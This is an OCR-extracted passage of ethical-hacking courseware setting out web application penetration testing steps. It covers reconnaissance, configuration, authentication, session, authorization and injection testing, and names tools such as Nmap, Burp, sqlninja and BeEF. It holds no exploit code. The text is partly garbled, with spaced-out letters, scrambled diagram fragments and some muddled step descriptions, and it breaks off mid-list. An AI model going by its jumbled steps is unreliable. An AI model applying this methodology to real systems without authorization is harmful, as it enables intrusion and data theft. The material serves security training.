e Retrieve and analyze robots.txt file
using tools such as GNU W get
e Use the advanced "s ite :" search
operator and then click "Cached"
to perform search engine
reconnaissance
Allowed and disallowed
directories
START
©
Identify application entry points
using tools such as Webscarab,
Burp proxy, OWASP ZAP, TamperlE
(for Internet Explorer), or Tamper
Data (for Firefox)
To identify web applications: probe
fo r URLs, do dictionary-style
searching (intelligent guessing)
and perform vulnerability scanning
using tools such as Nmap (Port
Scanner) and Nessus
Im plem ent techniques such as
DNS zone transfers, DNS inverse
queries, web-based DNS searches,
querying search engines (googling)
e
Issues of web application
‫״‬ ► structure, error pages
produced
V
Perform search engine
reconnaissance
Cookie information, 300
‫׳‬ •>■ HTTP and 400 status codes,
500 internal server errors
Web applications, old
versions of filesor artifacts
Web server software
version, scripting
environment, and OS in use
Identify application
e n try points
Identify the w eb
applications
Analyze the O/P from
HEAD and OPTIONS
h ttp requests
V
I n f o r m a t i o n G a t h e r i n g
L e t's g e t i n t o d e t a i l a n d d i s c u s s e a c h w e b a p p l i c a t i o n t e s t s t e p t h o r o u g h l y .
T h e f i r s t s t e p in w e b a p p l i c a t i o n p e n t e s t i n g is i n f o r m a t i o n g a t h e r i n g . T o g a t h e r all t h e
i n f o r m a t i o n a b o u t t h e t a r g e t a p p l i c a t i o n , f o l l o w t h e s e s t e p s :
S t e p 1: A n a l y z e t h e r o b o t s . t x t file
R o b o t . t x t is a file t h a t i n s t r u c t s w e b r o b o t s a b o u t t h e w e b s i t e s u c h a s d i r e c t o r i e s t h a t c a n b e
a l l o w e d a n d d i s a l l o w e d t o t h e u s e r . H e n c e , a n a l y z e t h e r o b o t . t x t a n d d e t e r m i n e t h e a l l o w e d
a n d d i s a l l o w e d d i r e c t o r i e s o f a w e b a p p l i c a t i o n . Y o u c a n r e t r i e v e a n d a n a l y z e r o b o t s . t x t file
u s i n g t o o l s s u c h a s G N U W g e t .
S t e p 2: P e r f o r m s e a r c h e n g i n e r e c o n n a i s s a n c e
U s e t h e a d v a n c e d " s i t e : " s e a r c h o p e r a t o r a n d t h e n click C a c h e d t o p e r f o r m s e a r c h e n g i n e
r e c o n n a i s s a n c e . It g i v e s y o u i n f o r m a t i o n s u c h a s i s s u e s o f w e b a p p l i c a t i o n s t r u c t u r e a n d e r r o r
p a g e s p r o d u c e d .

S t e p 3: I d e n t i f y a p p l i c a t i o n e n t r y p o i n t s
I d e n t i f y a p p l i c a t i o n e n t r y p o i n t s u s i n g t o o l s s u c h a s W e b s c a r a b , B u r p P r o x y , O W A S P ZAP,
T a m p e r l E (f o r I n t e r n e t E x p l o r e r ) , o r T a m p e r D a t a (f o r F ir efo x). C o o k i e i n f o r m a t i o n , 3 0 0 HTTP
a n d 4 0 0 s t a t u s c o d e s , a n d 5 0 0 i n t e r n a l s e r v e r e r r o r s m a y g i v e c l u e s a b o u t e n t r y p o i n t s o f t h e
t a r g e t w e b a p p l i c a t i o n .
S t e p 4 : I d e n t i f y t h e w e b a p p l i c a t i o n s
T o i d e n t i f y w e b a p p l i c a t i o n s : p r o b e f o r URLs, d o d i c t i o n a r y - s t y l e s e a r c h i n g ( i n t e l l i g e n t
g u e s s i n g ) , a n d p e r f o r m v u l n e r a b i l i t y s c a n n i n g u s i n g t o o l s s u c h a s N m a p ( P o r t S c a n n e r ) a n d
N e s s u s . C h e c k f o r w e b a p p l i c a t i o n s , o l d v e r s i o n s o f files, o r a r t i f a c t s . S o m e t i m e s t h e old
v e r s i o n s o f files m a y g iv e u s e f u l i n f o r m a t i o n t h a t a t t a c k e r s c a n u s e t o l a u n c h a t t a c k s o n t h e
w e b a p p l i c a t i o n .
S t e p 5: A n a l y z e t h e O / P f r o m H EA D a n d O P T I O N S h t t p r e q u e s t s
I m p l e m e n t t e c h n i q u e s s u c h a s DNS z o n e t r a n s f e r s , DNS i n v e r s e q u e r i e s , w e b - b a s e d DNS
s e a r c h e s , q u e r y i n g s e a r c h e n g i n e s ( G o o g l i n g ) . T h is m a y r e v e a l i n f o r m a t i o n s u c h a s w e b s e r v e r
s o f t w a r e v e r s i o n , s c r i p t i n g e n v i r o n m e n t , a n d O S in u s e .

I n f o r m a t i o n G a t h e r i n g r g u
( C o n t ’d ) (•lllfwtf | ltkl«4l NMhM
8 Analyze e rro r codes by requesting invalid
pages and utilize alternate request
m ethods (POST/PUT/Other) in order to
collect confidential in form ation from the
server
© Examine the source code from the
accessible pages of the application fro n t-
end
Test fo r recognized file
types/extensions/directories by requesting
com m on file extensions such as .ASP, .HTM,
.PHP, .EXE, and w atch fo r any unusual
o u tput or erro r codes
Perform TCP/ICMP and service
fingerprinting using traditional
fingerprinting tools such as Nmap and
Queso, or the m ore recent application
fingerprinting tool Amap
e
y
A nalysis o f e rro r
codes
.......
Software versions, details
of databases, bugs, and
technological components
>f
Test fo r recognized file
Web application
ty p e s /e x te n s io n s /
d ire cto rie s
environment
>f
Exam ine source o f
a vailab le pages
........
Provide dues as to the
underlying application
environment
>/
TC P/ICM P a nd service Web application services
fin g e rp rin tin g and associated ports
I n f o r m a t i o n G a t h e r i n g ( C o n t ’ d )
S t e p 6: A n a l y z e e r r o r c o d e s
A n a l y z e e r r o r c o d e s b y r e q u e s t i n g in v alid p a g e s a n d utilize a l t e r n a t e r e q u e s t m e t h o d s
( P O S T / P U T / O t h e r ) in o r d e r t o c o l l e c t c o n f i d e n t i a l i n f o r m a t i o n f r o m t h e s e r v e r . T his m a y r e v e a l
i n f o r m a t i o n s u c h a s s o f t w a r e v e r s i o n s , d e t a i l s o f d a t a b a s e s , b u g s , a n d t e c h n o l o g i c a l
c o m p o n e n t s .
S t e p 7: T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s
T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s b y r e q u e s t i n g c o m m o n file e x t e n s i o n s s u c h
a s .ASP, .H T M , .PH P, .EXE, a n d o b s e r v e t h e r e s p o n s e . T h is m a y g i v e y o u a n i d e a a b o u t t h e w e b
a p p l i c a t i o n e n v i r o n m e n t .
S t e p 8: E x a m i n e s o u r c e o f a v a i l a b l e p a g e s
E x a m i n e t h e s o u r c e c o d e f r o m t h e a c c e s s i b l e p a g e s o f t h e a p p l i c a t i o n f r o n t - e n d . T h is p r o v i d e s
c l u e s a b o u t t h e u n d e r l y i n g a p p l i c a t i o n e n v i r o n m e n t .
S t e p 9: T C P / I C M P a n d s e r v i c e f i n g e r p r i n t i n g
P e r f o r m T C P / I C M P a n d s e r v i c e f i n g e r p r i n t i n g u s i n g t r a d i t i o n a l f i n g e r p r i n t i n g t o o l s s u c h a s
N m a p a n d Q u e s o , o r t h e m o r e r e c e n t a p p l i c a t i o n f i n g e r p r i n t i n g t o o l s A m a p . T h is g i v e s y o u
i n f o r m a t i o n a b o u t w e b a p p l i c a t i o n s e r v i c e s a n d a s s o c i a t e d p o r t s .

rConfiguration M anagem ent
Testing ctertMM
E H
IU mjI Km Im
START 1
w Identifythe ports associated to SSL/TLS wrapped services using Nmap
and Nessus
» Perform network scanning and analyzethe web server banner
e Test the application configuration management using CGI scanners and
reviewing the contents ofthe web server, application server, comments,
configuration and logs
» Use vulnerability scanners, spidering and mirroring tools, searchengines
queries or perform manual inspection to test for file extensions handling
t» Review source code, enumerate application pages and functionality
& Perform directory and file enumeration, reviewing server and application
documentation, etc. to test for infrastructure and application admin
interfaces
» Review OPTIONS HTTP method using Netcat or Telnet
Credentials o f
legitim ate users
Adm in interfaces can be
found to gain access to
adm in functionality
..... >Test fo r HTTP m ethods
and XST
Test fo r infrastructure
and application admin
interfaces
&
‫מ‬
V
Perform infrastructure
configuration m anagement
testing
Perform application
configuration m anagem ent
testing
Test fo r file extensions
handling
Verify the presence o f old,
backup, and unreferenced
files
Disclosure o f confidential
inform ation
Source code o f the
application
Inform ation in the source
code, log files, and default <■
error codes
Confidential inform ation
about access credentials
Source code, installation
paths, passwords for
applications, and databases
C o n f i g u r a t i o n M a n a g e m e n t T e s t i n g
f ^
O n c e y o u g a t h e r i n f o r m a t i o n a b o u t t h e w e b a p p l i c a t i o n e n v i r o n m e n t , t e s t t h e
c o n f i g u r a t i o n m a n a g e m e n t . It is i m p o r t a n t t o t e s t t h e c o n f i g u r a t i o n m a n a g e m e n t b e c a u s e
i m p r o p e r c o n f i g u r a t i o n m a y a l l o w u n a u t h o r i z e d u s e r s t o b r e a k i n t o t h e w e b a p p l i c a t i o n .
S t e p l : P e r f o r m SSL/TLS t e s t i n g
SSL/TLS t e s t i n g a l l o w s y o u t o i d e n t i f y t h e p o r t s a s s o c i a t e d w i t h SSL/TLS w r a p p e d s e r v i c e s . Y ou
c a n d o t h i s w i t h t h e h e l p o f t o o l s s u c h a s N m a p a n d N e s s u s . T h is h e l p s d i s c l o s e c o n f i d e n t i a l
i n f o r m a t i o n .
S t e p 2: P e r f o r m i n f r a s t r u c t u r e c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
P e r f o r m n e t w o r k s c a n n i n g a n d a n a l y z e w e b s e r v e r b a n n e r s t o a n a l y z e t h e s o u r c e c o d e o f t h e
a p p l i c a t i o n .
S t e p 3: P e r f o r m a p p l i c a t i o n c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
T e s t t h e c o n f i g u r a t i o n m a n a g e m e n t o f i n f r a s t r u c t u r e u s i n g CGI s c a n n e r s a n d r e v i e w i n g t h e
c o n t e n t s o f t h e w e b s e r v e r , a p p l i c a t i o n s e r v e r , c o m m e n t s , c o n f i g u r a t i o n , a n d lo gs. T h is g i v e s
y o u i n f o r m a t i o n a b o u t t h e s o u r c e c o d e , lo g files, a n d d e f a u l t e r r o r c o d e s .

S t e p 4 : T e s t f o r file e x t e n s i o n s h a n d l i n g
U s e v u l n e r a b i l i t y s c a n n e r s , s p i d e r i n g a n d m i r r o r i n g t o o l s , s e a r c h e n g i n e s q u e r i e s , o r p e r f o r m
m a n u a l i n s p e c t i o n t o t e s t f o r file e x t e n s i o n s h a n d l i n g . T his m a y r e v e a l c o n f i d e n t i a l i n f o r m a t i o n
a b o u t a c c e s s c r e d e n t i a l s .
S t e p 5: V e r i f y t h e p r e s e n c e o f o l d , b a c k u p , a n d u n r e f e r e n c e d fi le s
R e v i e w s o u r c e c o d e a n d e n u m e r a t e a p p l i c a t i o n p a g e s a n d f u n c t i o n a l i t y t o v e r i f y t h e o ld ,
b a c k u p , a n d u n r e f e r e n c e d files. T h is m a y r e v e a l t h e i n s t a l l a t i o n p a t h s a n d p a s s w o r d s f o r
a p p l i c a t i o n s a n d d a t a b a s e s .
S t e p 6: T e s t f o r i n f r a s t r u c t u r e a n d a p p l i c a t i o n a d m i n i n t e r f a c e s
P e r f o r m d i r e c t o r y a n d file e n u m e r a t i o n , r e v i e w s e r v e r a n d a p p l i c a t i o n d o c u m e n t a t i o n , e t c . t o
t e s t f o r i n f r a s t r u c t u r e a n d a p p l i c a t i o n a d m i n i n t e r f a c e s . A d m i n i n t e r f a c e s c a n b e u s e d t o g a i n
a c c e s s t o t h e a d m i n f u n c t i o n a l i t y .
S t e p 7: T e s t f o r H TT P m e t h o d s a n d XST
R e v i e w O P T I O N S HTTP m e t h o d u s i n g N e t c a t o r T e l n e t t o t e s t f o r HTTP m e t h o d s a n d XST. T his
m a y r e v e a l c r e d e n t i a l s o f l e g i t i m a t e u s e r s .

C E HA u t h e n t i c a t i o n T e s t i n g
© Try to reset passw ords by guessing, social
engineering, or cracking secret questions, if
used. Check if "re m e m b e r m y passw o rd "
m echanism is im plem ented by checking the
HTML code o f the login page.
© Check if it is possible to "re u se " a session
a fte r lo g o u t. Also check if the a p p lica tio n
a u to m a tic a lly logs o u t a user w hen th a t user
has been idle fo r a certain am ount o f tim e,
and th a t no sensitive data remains stored in
the brow ser cache.
® Identify a ll param eters th a t are sent in
addition to the decoded CAPTCHA value fro m
the clie n t to the server and try to send an old
decoded CAPTCHA v a lu e w ith an old
CAPTCHA ID o f an o ld session ID
W Check if users hold a hardware device o f some
kind In addition to the password. Check if
h a rd w a re device c o m m u n ic a te s d ire c tly a n d
in d e p e n d e n tly w ith the authentication
infrastructure using an additional
com m unication channel.
® A tte m p t to fo rce a race co n d itio n , make
m ultiple sim ultaneous requests w h ile
observing the outcom e fo r unexpected
behavior. Perform code review.
A u th e n tica tio n
vulnerabilities
A u th e n tica tio n
vulnerabilities
M u ltip le fa cto rs
a u th e n tica tio n
vulnerabilities
Race cond itions
START
Test fo r lo g o u t and
b ro w se r cache
m a n a g e m e n t
V
Test fo r CAPTCHA
Test fo r m u ltip le
fa c to rs a u th e n tic a tio n
Test fo r race
c o n d itio n s
Hjjjjg A u t h e n t i c a t i o n T e s t i n g
Y ou n e e d t o p e r f o r m t h e f o l l o w i n g s t e p s t o c a r r y o u t a u t h e n t i c a t i o n t e s t i n g :
S t e p 1: T e s t f o r V u l n e r a b l e R e m e m b e r p a s s w o r d a n d p w d r e s e t
T e s t f o r V u l n e r a b l e R e m e m b e r p a s s w o r d a n d p w d r e s e t by a t t e m p t i n g t o r e s e t p a s s w o r d s b y
g u e s s i n g , s o c i a l e n g i n e e r i n g , o r c r a c k i n g s e c r e t q u e s t i o n s , if u s e d . C h e c k if a " r e m e m b e r m y
p a s s w o r d " m e c h a n i s m is i m p l e m e n t e d b y c h e c k i n g t h e H T M L c o d e o f t h e login p a g e ; t h r o u g h
t h i s p a s s w o r d , a u t h e n t i c a t i o n w e a k n e s s c a n b e u n c o v e r e d .
S t e p 2: T e s t f o r l o g o u t a n d b r o w s e r c a c h e m a n a g e m e n t
C h e c k if it is p o s s i b l e t o " r e u s e " a s e s s i o n a f t e r l o g o u t . A lso c h e c k if t h e a p p l i c a t i o n
a u t o m a t i c a l l y logs o u t a u s e r w h e n t h a t u s e r h a s b e e n idle f o r a c e r t a i n a m o u n t o f t i m e , a n d
t h a t n o s e n s i t i v e d a t a r e m a i n s s t o r e d in t h e b r o w s e r c a c h e .
S t e p 3: T e s t f o r C A P T C H A
I d e n t i f y all p a r a m e t e r s t h a t a r e s e n t in a d d i t i o n t o t h e d e c o d e d CAPTCHA v a l u e f r o m t h e c l i e n t
t o t h e s e r v e r a n d t r y t o s e n d a n o ld d e c o d e d C A P T C H A v a l u e w i t h a n o ld CAPTCHA ID o f a n old
s e s s i o n ID. T his h e l p s y o u t o d e t e r m i n e a u t h e n t i c a t i o n v u l n e r a b i l i t i e s .

S t e p 4 : T e s t f o r m u l t i p l e f a c t o r s a u t h e n t i c a t i o n
C h e c k if u s e r s h o l d a h a r d w a r e d e v i c e o f s o m e k in d in a d d i t i o n t o t h e p a s s w o r d . C h e c k if t h e
h a r d w a r e d e v i c e c o m m u n i c a t e s d i r e c t l y a n d i n d e p e n d e n t l y w i t h t h e a u t h e n t i c a t i o n
i n f r a s t r u c t u r e u s i n g a n a d d i t i o n a l c o m m u n i c a t i o n c h a n n e l .
S t e p 5: T e s t f o r r a c e c o n d i t i o n s
A t t e m p t t o f o r c e a r a c e c o n d i t i o n a n d m a k e m u l t i p l e s i m u l t a n e o u s r e q u e s t s w h i l e o b s e r v i n g
t h e o u t c o m e f o r u n e x p e c t e d b e h a v i o r . P e r f o r m c o d e r e v i e w t o c h e c k if t h e r e is a c h a n c e f o r
r a c e c o n d i t i o n s .

Session M an ag em en t Testing C E H
Collect sufficient num ber of cookie
samples, analyze the cookie generation
algorithm and forge a valid cookie in
order to perform the attack
Test fo r cookie a ttrib utes using
intercepting proxies such as Webscarab,
Burp proxy, OWASP ZAP, or traffic
intercepting browser plug-in's such as
"Tam perlE "(for IE) and "Tam per D ata"(for
Firefox)
To test fo r session fixation, make a
request to the site to be tested and
analyze vulnerabilities using the
WebScarab tool
Test fo r exposed session variables by
inspecting encryption & reuse of session
token, proxies & caching , GET & POST,
and tran sport vulnerabilities
Examine the URLs in the restricted area
to test forCSRF
Cookie tam pering results in
hijacking the sessions of
legitim ate users
Cookie inform ation to
hijack a valid session
Attacker could steal the
■^ user session (session
hijacking)
Confidential inform ation of
session token leads to a
replay session attack
Compromises end user data
■^ and operation or entire
w eb application
START
Test fo r cookie
a ttrib u te s
on
■
Test fo r session
fix a tio n
Test fo r exposed
session variables
V
Test forC SRF (Cross
Site Request
Forgery)
p y S j S e s s i o n M a n a g e m e n t T e s t i n g
A f t e r t e s t i n g t h e c o n f i g u r a t i o n m a n a g e m e n t , t e s t h o w t h e a p p l i c a t i o n m a n a g e s t h e
s e s s i o n . T h e f o l l o w i n g a r e t h e s t e p s t o c o n d u c t s e s s i o n m a n a g e m e n t p e n t e s t i n g :
S t e p 1: T e s t f o r s e s s i o n m a n a g e m e n t s c h e m a
C o l l e c t a s u f f i c i e n t n u m b e r o f c o o k i e s a m p l e s , a n a l y z e t h e c o o k i e g e n e r a t i o n a l g o r i t h m , a n d
f o r g e a v alid c o o k i e in o r d e r t o p e r f o r m t h e a t t a c k . T his a l l o w s y o u t o t e s t y o u r a p p l i c a t i o n
a g a i n s t c o o k i e t a m p e r i n g , w h i c h r e s u l t s in h i j a c k i n g t h e s e s s i o n s o f l e g i t i m a t e u s e r s .
S t e p 2: T e s t f o r c o o k i e a t t r i b u t e s
T e s t f o r c o o k i e a t t r i b u t e s u s i n g i n t e r c e p t i n g p r o x i e s s u c h a s W e b s c a r a b , B u r p P r o x y , O W A S P
ZAP, o r tr a f f i c i n t e r c e p t i n g b r o w s e r p l u g i n s s u c h a s " T a m p e r l E " ( f o r IE) a n d " T a m p e r D a t a " ( f o r
Fir efox). If y o u a r e a b l e t o r e t r i e v e c o o k i e i n f o r m a t i o n , t h e n y o u c a n u s e t h i s i n f o r m a t i o n t o
h ij a c k a v alid s e s s i o n .
S t e p 3: T e s t f o r s e s s i o n f i x a t i o n
T o t e s t f o r s e s s i o n f i x a t i o n , m a k e a r e q u e s t t o t h e s i t e t o b e t e s t e d a n d a n a l y z e v u l n e r a b i l i t i e s
u s i n g t h e W e b S c a r a b t o o l . T his h e l p s y o u t o d e t e r m i n e w h e t h e r y o u r a p p l i c a t i o n is v u l n e r a b l e
t o s e s s i o n h ij a c k in g .

S t e p 4 : T e s t f o r e x p o s e d s e s s i o n v a r i a b l e s
C o n f i d e n t i a l i n f o r m a t i o n o f s e s s i o n t o k e n l e a d s t o a r e p l a y s e s s i o n a t t a c k . T h e r e f o r e , t e s t f o r
e x p o s e d s e s s i o n v a r i a b l e s b y i n s p e c t i n g e n c r y p t i o n a n d r e u s e o f s e s s i o n t o k e n , p r o x i e s a n d
c a c h i n g , GET a n d POST, a n d t r a n s p o r t v u l n e r a b i l i t i e s .
S t e p 5: T e s t f o r CSRF ( C r o s s S i t e R e q u e s t F o r g e r y )
E x a m i n e t h e URLs in t h e r e s t r i c t e d a r e a t o t e s t f o r CSRF. A CSRF a t t a c k c o m p r o m i s e s e n d - u s e r
d a t a a n d o p e r a t i o n o r t h e e n t i r e w e b a p p l i c a t i o n .

A u t h o r i z a t i o n T e s t i n g C
teftMM
E H
ItkMJl Nm Im
START
y Can gain access to
reserved in fo rm a tio n
© Test fo r path traversal by performing input vector enum eration and analyzing the inp u t validation functions present in
the web application
e Test fo r bypassing authorization schema by examining the admin functionalities, to gain access to the resources
assigned to a different role
‫ט‬ Test fo r role/privilege m anipulation
A u t h o r i z a t i o n T e s t i n g
F o l l o w t h e s t e p s h e r e t o t e s t t h e w e b a p p l i c a t i o n a g a i n s t a u t h o r i z a t i o n
v u l n e r a b i l i t i e s :
S t e p 1: T e s t f o r p a t h t r a v e r s a l
T e s t f o r p a t h t r a v e r s a l b y p e r f o r m i n g i n p u t v e c t o r e n u m e r a t i o n a n d a n a l y z i n g t h e i n p u t
v a l i d a t i o n f u n c t i o n s p r e s e n t in t h e w e b a p p l i c a t i o n . P a t h t r a v e r s a l a l l o w s a t t a c k e r s t o g a i n
a c c e s s t o r e s e r v e d i n f o r m a t i o n .
S t e p 2: T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a
T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a b y e x a m i n i n g t h e a d m i n f u n c t i o n a l i t i e s , t o g a i n a c c e s s
t o t h e r e s o u r c e s a s s i g n e d t o a d i f f e r e n t r o l e . If t h e a t t a c k e r s u c c e e d s in b y p a s s i n g t h e
a u t h o r i z a t i o n s c h e m a , h e o r s h e c a n g a i n illegal a c c e s s t o r e s e r v e d f u n c t i o n s / r e s o u r c e s .
S t e p 3: T e s t f o r p r i v i l e g e e s c a l a t i o n
T e s t f o r r o l e / p r i v i l e g e m a n i p u l a t i o n . If t h e a t t a c k e r h a s a c c e s s t o r e s o u r c e s / f u n c t i o n a l i t y , t h e n
h e o r s h e c a n p e r f o r m a p r i v i l e g e e s c a l a t i o n a t t a c k .

D a t a V a l i d a t i o n T e s t i n g C E H
UrtifM itfciui Nm Im
START
Detect and analyze input vectorsfor potentialvulnerabilities, analyzethe
vulnerabilityreportand attempttoexploitit. Usetools such asOWASPCAL9000,
WebScarab,XSS-Proxy,ratproxy,and Burp Proxy
AnalyzeHTMLcode,test forStored XSS, leverageStoredXSS,verifyifthefile
upload allowssettingarbitraryMIMEtypes usingtoolssuchasOWASPCAL9000,
Hackvertor,BeEF,XSS-Proxy, Backframe,WebScarab, Burp,and XSSAssistant
9 Performsourcecode analysis to identifyJavaScript coding errors
9 AnalyzeSWFfiles usingtoolssuch as SWFIntruder, Decompiler ‫־‬Flare,Compiler
‫־‬ MTASC, Disassembler-Flasm,SwfmilI,and DebuggerVersionofFlash
Plugin/Player
9 PerformStandard SQLInjectionTesting, Union QuerySQLInjectionTesting,
Blind SQLInjection Testing,and Stored Procedure Injection usingtoolssuchas
OWASPSQLiX,sqlninja,SqlDumper,sqlbftools,SQLPower Injector,etc.
« Usea trialand error approach byinserting'(',' I', and the other
characters inorder tochecktheapplicationfor errors. Usethetool Softerra
LDAPBrowser
Session cookie
inform ation
Test fo r stored
cross-site scriptin g
Test fo r D O M -based
cross-site scriptin g
Sensitive inform ation
such as session
authorization tokens
Cookie inform ation
Inform ation on DOM-
based cross-site
scripting vulnerabilities
< .......
Test fo r cross site
flashing
Sensitive inform ation
about users and hosts
Database inform ation < .......
P erform SQL
in je ctio n te stin g
__ ^ P erform LDAP
in je ctio n te stin g
D a t a V a l i d a t i o n T e s t i n g
W e b a p p l i c a t i o n s m u s t e m p l o y p r o p e r d a t a v a l i d a t i o n m e t h o d s . O t h e r w i s e , t h e r e m a y
b e a c h a n c e f o r t h e a t t a c k e r t o b r e a k i n t o t h e c o m m u n i c a t i o n b e t w e e n t h e c l i e n t a n d t h e
s e r v e r , a n d i n j e c t m a l i c i o u s d a t a . H e n c e , t h e d a t a v a l i d a t i o n p e n t e s t i n g m u s t b e c o n d u c t e d t o
e n s u r e t h a t t h e c u r r e n t d a t a v a l i d a t i o n m e t h o d s o r t e c h n i q u e s e m p l o y e d b y t h e w e b
a p p l i c a t i o n o f f e r a p p r o p r i a t e s e c u r i t y . F o l l o w t h e s t e p s h e r e t o p e r f o r m d a t a v a l i d a t i o n t e s t i n g :
S t e p 1: T e s t f o r r e f l e c t e d c r o s s - s i t e s c r i p t i n g
A r e f l e c t e d c r o s s - s i t e s c r i p t i n g a t t a c k e r c r a f t s a URL t o e x p l o i t t h e r e f l e c t e d XSS v u l n e r a b i l i t y
a n d s e n d s it t o t h e c l i e n t in a s p a m m ail. If t h e v i c t i m clicks o n t h e link c o n s i d e r i n g it a s f r o m a
t r u s t e d s e r v e r , t h e m a l i c i o u s s c r i p t e m b e d d e d b y t h e a t t a c k e r in t h e URL g e t s e x e c u t e d o n t h e
v i c t i m ' s b r o w s e r a n d s e n d s t h e v i c t i m ' s s e s s i o n c o o k i e t o t h e a t t a c k e r . U s i n g t h i s s e s s i o n
c o o k i e , t h e a t t a c k e r c a n s t e a l t h e s e n s i t i v e i n f o r m a t i o n o f t h e v i c t i m . H e n c e , t o a v o i d t h i s k in d
o f a t t a c k y o u m u s t c h e c k y o u r w e b a p p l i c a t i o n s a g a i n s t r e f l e c t e d XSS a t t a c k s . If y o u p u t p r o p e r
d a t a v a l i d a t i o n m e c h a n i s m s o r m e t h o d s in p l a c e , t h e n y o u c a n d e t e r m i n e e a s i l y w h e t h e r t h e
URL c a m e o r i g in a l ly f r o m t h e s e r v e r o r it is c r a f t e d b y t h e a t t a c k e r . D e t e c t a n d a n a l y z e i n p u t
v e c t o r s f o r p o t e n t i a l v u l n e r a b i l i t i e s , a n a l y z e t h e v u l n e r a b i l i t y r e p o r t , a n d a t t e m p t t o e x p l o i t it.
U s e t o o l s s u c h a s O W A S P C A L 9 0 0 0 , H a c k v e r t o r , BeEF, X SS -P ro xy, B a c k f r a m e , W e b S c a r a b , XSS
A s s i s t a n t , a n d B u r p Pro x y .

S t e p 2: T e s t f o r s t o r e d c r o s s - s i t e s c r i p t i n g
A n a l y z e H TM L c o d e , t e s t f o r S t o r e d XSS, l e v e r a g e S t o r e d XSS, a n d v e r i f y if t h e file u p l o a d a l l o w s
s e t t i n g a r b i t r a r y M I M E t y p e s u s i n g t o o l s s u c h a s O W A S P C A L 9 0 0 0 , H a c k v e r t o r , BeEF, X SS-Proxy,
B a c k f r a m e , W e b S c a r a b , B u r p , a n d XSS A s s i s t a n t . S t o r e d XSS a t t a c k s a l l o w a t t a c k e r s t o u n c o v e r
s e n s i t i v e i n f o r m a t i o n s u c h a s s e s s i o n a u t h o r i z a t i o n t o k e n s .
S t e p 3: T e s t f o r D O M - b a s e d c r o s s - s i t e s c r i p t i n g
D O M XSS a t t a c k s t a n d s f o r d o c u m e n t o b j e c t m o d e l b a s e d c r o s s - s i t e s c r i p t i n g a t t a c k , w h i c h
a f f e c t s t h e c l i e n t ' s b r o w s e r s c r i p t c o d e . In t h i s a t t a c k , t h e i n p u t is t a k e n f r o m t h e u s e r a n d t h e n
s o m e m a l i c i o u s a c t i o n is p e r f o r m e d w i t h it, w h i c h in t u r n l e a d s t o t h e e x e c u t i o n o f i n j e c t e d
m a l i c i o u s c o d e . W e b a p p l i c a t i o n s c a n b e t e s t e d a g a i n s t D O M XSS a t t a c k s b y p e r f o r m i n g s o u r c e
c o d e a n a l y s i s t o i d e n t i f y J a v a S c r i p t c o d i n g e r r o r s .
S t e p 4 : T e s t f o r c r o s s s i t e f l a s h i n g
A n a l y z e S W F files u s i n g t o o l s s u c h a s S W F I n t r u d e r , D e c o m p i l e r - F lare, C o m p i l e r - MTASC,
D i s a s s e m b l e r - F l a s m , S w fm ill, a n d D e b u g g e r V e r s i o n o f t h e F la sh P l u g i n / P l a y e r . F l a w e d f l a s h
a p p l i c a t i o n s m a y c o n t a i n D O M - b a s e d XSS v u l n e r a b i l i t i e s . T h e t e s t f o r c r o s s - s i t e f l a s h i n g g i v e s
i n f o r m a t i o n o n D O M - b a s e d c r o s s - s i t e s c r i p t i n g v u l n e r a b i l i t i e s .
S t e p 5: P e r f o r m SQL i n j e c t i o n t e s t i n g
P e r f o r m s t a n d a r d SQL i n j e c t i o n t e s t i n g , u n i o n q u e r y SQL i n j e c t i o n t e s t i n g , b li n d SQL i n j e c t i o n
t e s t i n g , a n d s t o r e d p r o c e d u r e i n j e c t i o n u s i n g t o o l s s u c h a s O W A S P SQLiX, s q l n i n j a , S q l D u m p e r ,
s q l b f t o o l s , SQL P o w e r I n j e c t o r , e t c . SQ L i n j e c t i o n a t t a c k s g i v e d a t a b a s e i n f o r m a t i o n t o t h e
a t t a c k e r .
S t e p 6: P e r f o r m LDAP i n j e c t i o n t e s t i n g
U s e a tr ial a n d e r r o r a p p r o a c h b y i n s e r t i n g '(', 11', a n d t h e o t h e r c h a r a c t e r s in o r d e r t o
c h e c k t h e a p p l i c a t i o n f o r e r r o r s . U s e t h e t o o l S o f t e r r a LDAP B r o w s e r . T h e LDAP i n j e c t i o n m a y
r e v e a l s e n s i t i v e i n f o r m a t i o n a b o u t u s e r s a n d h o s t s .

CEHD a ta V alid atio n Testing
( C o n t ’d )
© D iscover v u ln e ra b ilitie s o f an ORM
to o l and te st w e b a pp lica tions th a t use
ORM. Use to o ls such as H ibernate,
N hibernate, and Ruby On Rails
© Try to insert XML m eta characters
© Find if th e w e b server actu a lly
su p p o rts SSI d ire ctive s using to o ls
such as W eb Proxy Burp Suite, OWASP
ZAP, W ebScarab, String searcher: grep
© In je c t XPath code and in te rfe re w ith
the query result
© Id e n tify v u ln e ra b le param eters.
U nderstand th e data flo w and
d e p loym ent stru ctu re o f the client,
and p e rfo rm IMAP/SMTP com m and
in jection
In fo rm a tio n on SQL
in je ctio n vuln e ra b ility
In fo rm a tio n abo ut
XML structure
W eb server CGI
enviro nm e nt variables
Access co n fid e n tia l
in fo rm a tio n
Access to th e backend
m ail server
P e rform IM A P /S M T P
in je c tio n te stin g
D a t a V a l i d a t i o n T e s t i n g ( C o n t ’ d )
S t e p 7: P e r f o r m O R M i n j e c t i o n t e s t i n g
P e r f o r m O R M i n j e c t i o n t e s t i n g t o d i s c o v e r v u l n e r a b i l i t i e s o f a n O R M t o o l a n d t e s t w e b
a p p l i c a t i o n s t h a t u s e O R M . U s e t o o l s s u c h a s H i b e r n a t e , N h i b e r n a t e , a n d R u b y O n Rails. T his
t e s t g i v e s i n f o r m a t i o n o n SQL i n j e c t i o n v u l n e r a b i l i t i e s .
S t e p 8: P e r f o r m X M L i n j e c t i o n t e s t i n g
T o p e r f o r m XML i n j e c t i o n t e s t i n g , t r y t o i n s e r t XML m e t a c h a r a c t e r s a n d o b s e r v e t h e r e s p o n s e .
A s u c c e s s f u l XML i n j e c t i o n m a y g iv e i n f o r m a t i o n a b o u t X M L s t r u c t u r e .
S t e p 9: P e r f o r m SSI i n j e c t i o n t e s t i n g
